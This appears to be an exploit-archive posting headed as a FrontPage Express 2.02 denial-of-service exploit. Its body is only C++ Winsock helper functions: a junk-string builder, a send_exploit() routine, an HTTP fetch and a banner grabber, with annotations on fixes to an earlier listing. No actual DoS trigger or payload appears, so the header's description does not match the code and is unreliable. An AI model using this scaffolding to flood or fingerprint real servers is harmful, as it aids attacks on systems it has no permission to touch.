|
# Title :frontpage_express2.02 Denial of Service winsock
# Author :TrOoN
# E-mail : SOUrRce-x@live.fr | www.facebook.com/fysl.fyslm
# Home : city 617 logts : Draria . algeria
# Web Site : www.1337day.com |
# platform : WinDows XP sp 2
# Type : local exploit /SHELL CODE /ETc...
#Download link : http://www.jetelecharge.com/Internet/271.php
# waRn : frontpage_express2.02 no frontpage
~~
######################################## Begin ##################################
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
/* Capacity in bytes (64 KiB) of the fixed-size string buffers in this file:
 * the repeated string built by junk() and the outgoing request buffers. */
#define STRING_MAX 65536
/* 8 MiB (8 * 1024 * 1024): size of the receive and scratch buffers in this
 * file. Large enough to overflow a default-sized thread stack, so buffers of
 * this size belong on the heap. */
#define MAX 8388608
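/*
 * Build a string consisting of `input` repeated up to `repeat` times.
 *
 * The number of copies is capped so that the result, including its
 * terminating NUL, always fits in STRING_MAX bytes. When the parameters are
 * invalid (NULL or empty input, repeat <= 0, repeat >= STRING_MAX, or an
 * input longer than STRING_MAX - 1) a message is printed and the returned
 * string is "--FAILURE--".
 *
 * Returns a buffer of STRING_MAX bytes allocated with new[]. The caller owns
 * it and must release it with delete[].
 */
char *junk(char *input, int repeat)
{
    char *junkString = new char[STRING_MAX];
    junkString[0] = '\0';

    /* strlen(NULL) is undefined behaviour; treat NULL like an empty input. */
    size_t inputLen = (input != NULL) ? strlen(input) : 0;

    if (repeat > 0 && repeat < STRING_MAX && inputLen != 0
        && inputLen <= (STRING_MAX - 1))
    {
        size_t maxCopies = (STRING_MAX - 1) / inputLen;
        size_t copies = ((size_t)repeat < maxCopies) ? (size_t)repeat : maxCopies;

        /* Append at a moving write position instead of calling strcat(),
         * which rescans the whole buffer on every iteration. */
        char *writePos = junkString;
        for (size_t count = 0; count < copies; count++)
        {
            memcpy(writePos, input, inputLen);
            writePos += inputLen;
        }
        *writePos = '\0';
    }
    else
    {
        printf("Invalid Perameters! \n");
        strcpy(junkString, "--FAILURE--");
    }

    /* The original listing ran delete[] on junkString immediately before
     * returning it, handing every caller a dangling pointer (use after
     * free). Ownership is transferred to the caller instead. */
    return junkString;
}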
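/*
 * Report whether a TCP connection to targetip:port can be established.
 *
 * targetip  host name or dotted IPv4 address, resolved with gethostbyname()
 * port      TCP port, 1..65535
 *
 * Returns true when connect() succeeds, false on any failure (invalid
 * arguments, Winsock start-up, socket creation, name resolution, connect).
 * The socket is closed and Winsock is released before returning.
 */
bool is_up(char *targetip, int port)
{
    WSADATA wsaData;
    struct hostent *pTarget;   /* the listing declared "target_ptr" but used pTarget */
    struct sockaddr_in sock;
    SOCKET MySock;

    /* (USHORT)port would silently truncate out-of-range values. */
    if (targetip == NULL || port < 1 || port > 65535)
    {
        return false;
    }

    /* WSAStartup() returns 0 on success and a positive error code on
     * failure, so the original "< 0" test could never detect a failure.
     * WSACleanup() is only paired with a successful start-up. */
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
    {
        printf("############ERROR!####################\n");
        printf("Your ws2_32.dll is too old to use this application. \n");
        printf("Go to microsofts web site to download the most recent \n");
        printf("version of ws2_32.dll. \n");
        return false;
    }

    MySock = socket(AF_INET, SOCK_STREAM, 0);
    if (MySock == INVALID_SOCKET)
    {
        /* Nothing to close: socket() did not return a handle. */
        printf("Socket error!\r\n");
        WSACleanup();
        return false;
    }

    pTarget = gethostbyname(targetip);
    if (pTarget == NULL)
    {
        printf("\nResolve of %s failed, please try again.\n", targetip);
        closesocket(MySock);
        WSACleanup();
        return false;
    }

    /* Only copy the address when it is an IPv4 address of the expected
     * size; memcpy() with an unchecked h_length could write past sin_addr. */
    if (pTarget->h_addrtype != AF_INET
        || pTarget->h_length != (int)sizeof(sock.sin_addr))
    {
        closesocket(MySock);
        WSACleanup();
        return false;
    }

    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, sizeof(sock.sin_addr));
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    bool reachable = (connect(MySock, (struct sockaddr *)&sock, sizeof(sock)) == 0);

    closesocket(MySock);
    WSACleanup();
    return reachable;
}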
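/*
 * Report whether `needle` occurs anywhere inside `haystack`.
 *
 * Returns true when strstr() finds a match (an empty needle always matches),
 * false otherwise. A NULL argument yields false instead of being passed to
 * strstr(), where it would be undefined behaviour.
 */
bool is_string_in(char *needle, char *haystack)
{
    if (needle == NULL || haystack == NULL)
    {
        return false;
    }

    /* Return the comparison directly as a C++ bool rather than going through
     * the Windows TRUE/FALSE integer macros. */
    return strstr(haystack, needle) != NULL;
}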
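/*
 * Replace the first occurrence of `old_str` in `whole_str` with `new_str`,
 * editing `whole_str` in place.
 *
 * new_str    replacement text; must not point into whole_str
 * old_str    text to look for
 * whole_str  writable, NUL-terminated buffer that is modified
 *
 * Returns whole_str. When old_str does not occur, or any argument is NULL,
 * the buffer is left unchanged.
 *
 * The function has no capacity parameter, so it cannot verify that the
 * result fits: when new_str is longer than old_str the caller must guarantee
 * that whole_str has at least strlen(new_str) - strlen(old_str) spare bytes.
 */
char *replace_string(char *new_str, char *old_str, char *whole_str)
{
    if (new_str == NULL || old_str == NULL || whole_str == NULL)
    {
        return whole_str;
    }

    char *loc = strstr(whole_str, old_str);
    if (loc == NULL)
    {
        return whole_str;
    }

    size_t old_len = strlen(old_str);
    size_t new_len = strlen(new_str);
    size_t tail_len = strlen(loc + old_len) + 1;   /* include the NUL */

    /* The original staged the result in an 8 MiB array on the stack, which
     * exceeds a default-sized thread stack and overflowed for longer
     * results. Shifting the tail in place needs no scratch buffer;
     * memmove() is used because source and destination overlap. */
    memmove(loc + new_len, loc + old_len, tail_len);
    memcpy(loc, new_str, new_len);

    return whole_str;
}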
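/*
 * Open a TCP connection to targetip:port, send `send_string` and return the
 * data read by a single recv() call.
 *
 * targetip     host name or dotted IPv4 address
 * port         TCP port, 1..65535
 * send_string  NUL-terminated data to send, at most STRING_MAX - 1 bytes
 *
 * Returns a NUL-terminated buffer allocated with new[]; the caller owns it
 * and must release it with delete[]. When recv() fails a message is printed
 * and an empty string is returned. Any other failure prints a message and
 * terminates the process with exit(1), as in the original listing.
 */
char *send_exploit(char *targetip, int port, char *send_string)
{
    WSADATA wsaData;
    struct hostent *pTarget;   /* the listing declared "target_ptr" but used pTarget */
    struct sockaddr_in sock;
    SOCKET MySock;

    /* The original strcpy()'d send_string into a STRING_MAX stack buffer
     * without checking its length; reject oversized input up front. */
    if (targetip == NULL || send_string == NULL || port < 1 || port > 65535
        || strlen(send_string) > (STRING_MAX - 1))
    {
        printf("Invalid parameters.\n");
        exit(1);
    }
    int sendLen = (int)strlen(send_string);

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
    {
        /* No WSACleanup(): it is only paired with a successful start-up. */
        printf("############### ERROR!######################\n");
        printf("Your ws2_32.dll is too old to use this application. \n");
        printf("Go to Microsoft's web site to download the most recent \n");
        printf("version of ws2_32.dll. \n");
        exit(1);
    }

    MySock = socket(AF_INET, SOCK_STREAM, 0);
    if (MySock == INVALID_SOCKET)
    {
        printf("Socket error!\r\n");
        WSACleanup();
        exit(1);
    }

    pTarget = gethostbyname(targetip);
    if (pTarget == NULL)
    {
        printf("Resolve of %s failed, please try again.\n", targetip);
        closesocket(MySock);
        WSACleanup();
        exit(1);
    }

    /* Copy the address only when it has the size of an IPv4 address. */
    if (pTarget->h_addrtype != AF_INET
        || pTarget->h_length != (int)sizeof(sock.sin_addr))
    {
        printf("Resolve of %s failed, please try again.\n", targetip);
        closesocket(MySock);
        WSACleanup();
        exit(1);
    }

    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, sizeof(sock.sin_addr));
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    if (connect(MySock, (struct sockaddr *)&sock, sizeof(sock)) != 0)
    {
        printf("Couldn't connect to host.\n");
        closesocket(MySock);
        WSACleanup();
        exit(1);
    }

    /* Send exactly the string, once. The original sent sizeof(buffer) - 1
     * bytes, i.e. the string followed by uninitialised stack memory, and
     * then repeated the send() with its result ignored. */
    if (send(MySock, send_string, sendLen, 0) == SOCKET_ERROR)
    {
        printf("Error sending Packet\r\n");
        closesocket(MySock);
        WSACleanup();
        exit(1);
    }

    /* recv() is limited to the real buffer size; the original passed
     * MAX + 1 for a buffer of MAX bytes. */
    char *recvString = new char[MAX];
    int nret = recv(MySock, recvString, MAX, 0);

    char *output;
    if (nret == SOCKET_ERROR)
    {
        printf("Attempt to receive data FAILED. \n");
        /* The original sized the result with new char[nret] before this
         * check, i.e. with a negative length on error. */
        output = new char[1];
        output[0] = '\0';
    }
    else
    {
        /* One extra byte for the terminator; the original buffer of nret
         * bytes was overrun by the NUL that strncat() appends. */
        output = new char[nret + 1];
        memcpy(output, recvString, (size_t)nret);
        output[nret] = '\0';
    }
    delete [] recvString;   /* released on both paths; it leaked on error before */

    closesocket(MySock);
    WSACleanup();
    return output;
}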
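/*
 * Send "GET <file> HTTP/1.1" to targetip:port and return the data read by a
 * single recv() call.
 *
 * targetip  host name or dotted IPv4 address
 * port      TCP port, 1..65535
 * file      request path; the complete request must fit in STRING_MAX - 1
 *           bytes
 *
 * The Host header is fixed to "localhost" regardless of targetip, as in the
 * original listing.
 *
 * Returns a NUL-terminated buffer allocated with new[]; the caller owns it
 * and must release it with delete[]. When recv() fails a message is printed
 * and an empty string is returned. Any other failure prints a message and
 * terminates the process with exit(1), as in the original listing.
 */
char *get_http(char *targetip, int port, char *file)
{
    static const char requestHead[] = "GET ";
    static const char requestTail[] = " HTTP/1.1 \r\nHost: localhost\r\n\r\n";

    WSADATA wsaData;
    struct hostent *pTarget;   /* the listing declared "target_ptr" but used pTarget */
    struct sockaddr_in sock;
    SOCKET MySock;
    char sendfile[STRING_MAX];

    /* The original strcat()'d `file` into sendfile without a length check;
     * refuse a path that would not fit together with the fixed parts. */
    if (targetip == NULL || file == NULL || port < 1 || port > 65535
        || strlen(file) > sizeof(sendfile) - sizeof(requestHead) - sizeof(requestTail) + 1)
    {
        printf("Invalid parameters.\n");
        exit(1);
    }

    strcpy(sendfile, requestHead);
    strcat(sendfile, file);
    strcat(sendfile, requestTail);
    int sendLen = (int)strlen(sendfile);

    /* WSAStartup() returns 0 on success and a positive error code on
     * failure, so the original "< 0" test could never detect a failure. */
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
    {
        printf("################# ERROR! ###################\n");
        printf("Your ws2_32.dll is too old to use this application. \n");
        printf("Go to microsofts web site to download the most recent \n");
        printf("version of ws2_32.dll. \n");
        exit(1);
    }

    MySock = socket(AF_INET, SOCK_STREAM, 0);
    if (MySock == INVALID_SOCKET)
    {
        printf("Socket error!\r\n");
        WSACleanup();
        exit(1);
    }

    pTarget = gethostbyname(targetip);
    if (pTarget == NULL)
    {
        printf("Resolve of %s failed, please try again.\n", targetip);
        closesocket(MySock);
        WSACleanup();
        exit(1);
    }

    /* Copy the address only when it has the size of an IPv4 address. */
    if (pTarget->h_addrtype != AF_INET
        || pTarget->h_length != (int)sizeof(sock.sin_addr))
    {
        printf("Resolve of %s failed, please try again.\n", targetip);
        closesocket(MySock);
        WSACleanup();
        exit(1);
    }

    memset(&sock, 0, sizeof(sock));
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, sizeof(sock.sin_addr));
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    if (connect(MySock, (struct sockaddr *)&sock, sizeof(sock)) != 0)
    {
        printf("Couldn't connect to host.\n");
        closesocket(MySock);
        WSACleanup();
        exit(1);
    }

    /* Send exactly the request, once. The original sent sizeof(sendfile) - 1
     * bytes, i.e. the request followed by uninitialised stack memory, and
     * then repeated the send() with its result ignored. */
    if (send(MySock, sendfile, sendLen, 0) == SOCKET_ERROR)
    {
        printf("Error sending Packet\r\n");
        closesocket(MySock);
        WSACleanup();
        exit(1);
    }

    /* recv() is limited to the real buffer size; the original passed
     * MAX + 1 for a buffer of MAX bytes. */
    char *recvString = new char[MAX];
    int nret = recv(MySock, recvString, MAX, 0);

    char *output;
    if (nret == SOCKET_ERROR)
    {
        printf("Attempt to receive data FAILED. \n");
        /* The original sized the result with new char[nret] before this
         * check, i.e. with a negative length on error. */
        output = new char[1];
        output[0] = '\0';
    }
    else
    {
        /* One extra byte for the terminator; the original buffer of nret
         * bytes was overrun by the NUL that strncat() appends. */
        output = new char[nret + 1];
        memcpy(output, recvString, (size_t)nret);
        output[nret] = '\0';
    }
    delete [] recvString;   /* released on both paths; it leaked on error before */

    closesocket(MySock);
    WSACleanup();
    return output;
}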
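/*
 * Fetch "/" from targetip:port with get_http() and extract the line that
 * starts with "Server:" from the response.
 *
 * Returns a buffer of MAX bytes allocated with new[]; the caller owns it and
 * must release it with delete[]. The buffer holds:
 *   - a space, the character preceding "Server:" (when there is one) and
 *     the header line up to, but not including, the character before the
 *     line feed (presumably the '\r' of a CRLF ending), or
 *   - "EOF" when the response contains no "Server:" text.
 * This is the same text the original produced for a header that is neither
 * first in the response nor unterminated.
 */
char *banner_grab(char *targetip, int port)
{
    char start_banner[] = "Server:";
    char root_path[] = "/";   /* writable copy: get_http() takes a non-const char * */
    char *ret_banner = new char[MAX];
    char *buffer = get_http(targetip, port, root_path);

    char *pt = (buffer != NULL) ? strstr(buffer, start_banner) : NULL;
    if (pt != NULL)
    {
        /* The original always started one character before the match and
         * read buffer[-1] when the match was at offset 0. */
        char *copy_from = (pt > buffer) ? pt - 1 : pt;

        /* Without a line feed the original computed a negative length, which
         * strncat() received as a huge unsigned count. Copy to the end of
         * the response in that case. */
        char *eol = strchr(pt, '\n');
        char *copy_to = (eol != NULL) ? eol - 1 : pt + strlen(pt);

        size_t count = (size_t)(copy_to - copy_from);
        if (count > (size_t)(MAX - 2))
        {
            count = (size_t)(MAX - 2);   /* leave room for the space and the NUL */
        }

        ret_banner[0] = ' ';
        memcpy(ret_banner + 1, copy_from, count);
        ret_banner[1 + count] = '\0';
    }
    else
    {
        strcpy(ret_banner, "EOF");
    }

    /* The response buffer returned by get_http() was never released. */
    delete [] buffer;

    return ret_banner;
}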
################### ENd ########################
|